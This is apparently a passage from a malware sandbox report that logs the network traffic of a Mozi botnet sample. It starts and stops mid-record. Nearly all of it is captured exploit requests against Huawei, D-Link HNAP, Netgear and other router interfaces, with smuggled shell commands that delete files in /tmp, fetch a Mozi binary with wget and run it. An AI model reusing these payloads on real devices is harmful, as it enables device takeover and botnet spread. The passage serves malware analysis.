62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 37.42.125.130:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 51.165.1.43:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 140.36.171.144:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 62.243.148.102:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 76.203.109.162:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 183.24.233.90:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 120.142.55.49:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 82.138.197.3:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 